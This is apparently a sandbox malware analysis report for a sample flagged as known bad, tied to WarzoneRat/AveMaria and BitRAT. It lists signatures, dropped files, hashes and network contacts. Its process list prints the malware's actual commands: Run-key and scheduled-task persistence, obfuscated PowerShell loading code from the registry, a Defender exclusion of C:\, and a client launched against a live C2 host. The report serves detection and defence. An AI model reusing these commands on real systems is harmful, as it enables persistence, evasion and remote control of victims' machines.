Analysis Overview
SHA256
3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1
Threat Level: Known bad
The file 8565653741.zip was found to be: Known bad.
Malicious Activity Summary
WarzoneRat, AveMaria
BitRAT
Suspicious use of NtCreateUserProcessOtherParentProcess
Executes dropped EXE
Modifies Installed Components in the registry
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Modifies system certificate store
Modifies registry class
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of SendNotifyMessage
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-12-15 13:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-12-15 13:24
Reported
2022-12-15 13:27
Platform
win7-20220812-en
Max time kernel
150s
Max time network
43s
Command Line
Signatures
BitRAT
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1472 created 416 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1624 created 416 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| N/A | N/A | C:\ProgramData\$77images.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1476 set thread context of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1472 set thread context of 1196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1624 set thread context of 2144 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GoogleUpdate.dll | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df48109110d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\cmd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {A99EE01B-E8FC-40AC-BFAA-FB04EFD10345} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "781834726-469034446389577595-1944380462-2039113711-55127832512762804791238524382"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline"
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{28133f46-3ead-466c-9f65-412012f4dd54}
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
C:\ProgramData\$77images.exe
"C:\ProgramData\$77images.exe"
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{900f862d-3775-444b-a619-2e15ccffe35b}
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1476-54-0x0000000000210000-0x0000000000AEC000-memory.dmp
memory/1476-55-0x0000000075E51000-0x0000000075E53000-memory.dmp
memory/1996-56-0x0000000000000000-mapping.dmp
memory/604-58-0x0000000000000000-mapping.dmp
memory/840-59-0x0000000000000000-mapping.dmp
memory/1096-60-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-61-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-62-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-64-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-66-0x000000000040159D-mapping.dmp
memory/1096-65-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-69-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1996-70-0x0000000070CC0000-0x000000007126B000-memory.dmp
memory/1792-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 11ba16e5ee0670ab6d6b482c52b7fdba |
| SHA1 | 5e530389d8005031f990e4dced5797f8cb9703b7 |
| SHA256 | f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b |
| SHA512 | b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81 |
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
memory/524-75-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
